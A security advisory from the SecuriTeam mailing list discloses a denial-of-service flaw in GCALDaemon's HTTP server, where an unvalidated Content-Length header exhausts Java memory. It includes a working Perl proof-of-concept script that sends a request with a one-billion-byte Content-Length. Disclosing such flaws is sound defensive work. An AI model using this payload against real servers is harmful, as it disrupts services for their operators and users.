The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
GCALDaemon DoS
------------------------------------------------------------------------
SUMMARY
<http://gcaldaemon.sourceforge.net/> GCALDaemon is "an OS-independent
Java program that offers two-way synchronization between Google Calendar
and various iCalendar compatible calendar applications. GCALDaemon is
primarily designed as a calendar synchronizer but it can also be used as a
Gmail notifier, Address Book importer, Gmail terminal and RSS feed
converter".
Sunbird/Kontact/Firefox/ThunderBird/Mozilla Calendar all share calendars
over HTTP, by uploading their file via an HTTP PUT and getting/refreshing
their calendar with an HTTP GET. The GCALDaemon's built-in HTTP server
keeps this HTTP messages in sync with a specified Google Calendar. An
input validation flaw permits to craft an HTTP request with an abnormal
content-length value; this malformed request could trigger a denial of
service that arises from a Java out of memory fatal error.
DETAILS
Vulnerable Systems:
* GALDaemon version 1.0-beta13
Using a crafted HTTP request, an attacker could trigger a denial of
service that arises from a java.lang.OutOfMemoryError when the Java heap
space is overfilled. In the file
"org/gcaldaemon/core/http/HTTPListener.java", the GCALDaemon's built-in
HTTP server parses the HTTP request and the HTTP header parameters without
validation checkpoints. In the line of code
"490:org/gcaldaemon/core/http/HTTPListener.java" the "Content-Length"
header parameter is used to create a new byte array; when the size of this
structure is big enough, it could trigger a Java fatal error that blocks
the HTTP daemon:
Exception in thread "HTTP listener" java.lang.OutOfMemoryError: Java heap
space
at
org.gcaldaemon.core.http.HTTPListener.readRequest(HTTPListener.java:490)
at
org.gcaldaemon.core.http.HTTPListener.run(HTTPListener.java:167)
Exploit:
The provided proof-of-concept can trigger the issue.
--------------------------------------------
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port,
PeerProto => 'tcp')
or die "error: $!\n";
print "GCALDaemom DoS Expoit\n";
print "Just 4 seconds...\n";
sleep 4;
$sock->send("GET / HTTP/1.1\r\n");
$sock->send("Content-Length: 1000000000\r\n\r\n");
$sock->close;
print "\n\nNo more sync!\n";
--------------------------------------------
ADDITIONAL INFORMATION
The information has been provided by
<mailto:luca.carettoni@securenetwork.it> Luca Carettoni.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
